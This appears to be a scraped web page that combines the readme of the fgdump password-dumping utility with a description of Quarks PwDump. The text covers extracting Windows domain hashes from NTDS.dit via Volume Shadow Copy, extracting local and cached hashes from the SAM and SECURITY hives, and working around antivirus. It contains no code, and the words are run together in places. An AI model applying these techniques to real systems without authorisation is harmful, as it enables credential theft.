Pwdump Windows
. fgdump - A utility for dumping passwords on Windows NT/2000/XP/2003 machines.Written by fizzgig (fizzgig@foofus.net)Greets to all my fellow Foofites: j0m0-Kun (who is the inspiration for this program),phenfen, omi, fade, pmonkey, grunch, rockdon, reefman and of course our namesake foofus.Many thanks to the awesome folks who created cachedump and pwdump3e as well!More information:fgdump was born out of frustration with current antivirus (AV) vendors who only partiallyhandled execution of programs like pwdump. Certain vendors' solutions wouldsometimes allow pwdump to run, sometimes not, and sometimes lock up the box.
As such,we as security engineers had to remember to shut off antivirus before running pwdump andsimilar utilities like cachedump. Needless to say, we're forgetful sometimes.So fgdump started as simply a wrapper around things we had to do to make pwdump workeffectively. Later, cachedump was added to the mix, as were a couple other variationsof AV. Over time it has grown, and continues to grow, to support our assessments andother projects. We are beginning to use it extensively within Windows domains forbroad password auditing, and in conjunction with other tools (ownr and pwdumpToMatrix.pl)for discovering implied trust relationships.fgdump is targetted at the security auditing community, and is designed to be used forgood, not evil.:) Note that, in order to effectively use fgdump, you're going to needhigh-power credentials (Administrator or Domain Administrator, in most cases), thuslimiting its usefulness as a hacking tool.
Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. Case #1: Domain accounts hashes are extracted offline from NTDS.ditIt's not currently full offline dump cause Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET databases parsing) which differs between Windows versions.
For example, it's not possible to parse Win 2008 NTDS.dit file from XP. In fact, record's checksum are computed in a different manner and database files appear corrupted for API functions.That's currently the main drawback of the tool, everything should be done on domaincontroller.
However no code injection or service installation are made and it's possible to securely copyNTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service). Case #3: Local account and cached domain credentialsThere aren't something really new here, a lot of tools are already dumping them without any problems.
Pwdump Windows 10
However we have choosed an uncommmon way to dump them, only few tools use this technique.Hashes are extracted live from SAM and SECURITY hive in a proper way without code injection/service. In fact, we use native registry API, especially RegSaveKey and RegLoadKey functions which require SeBackup and SeRestore privileges.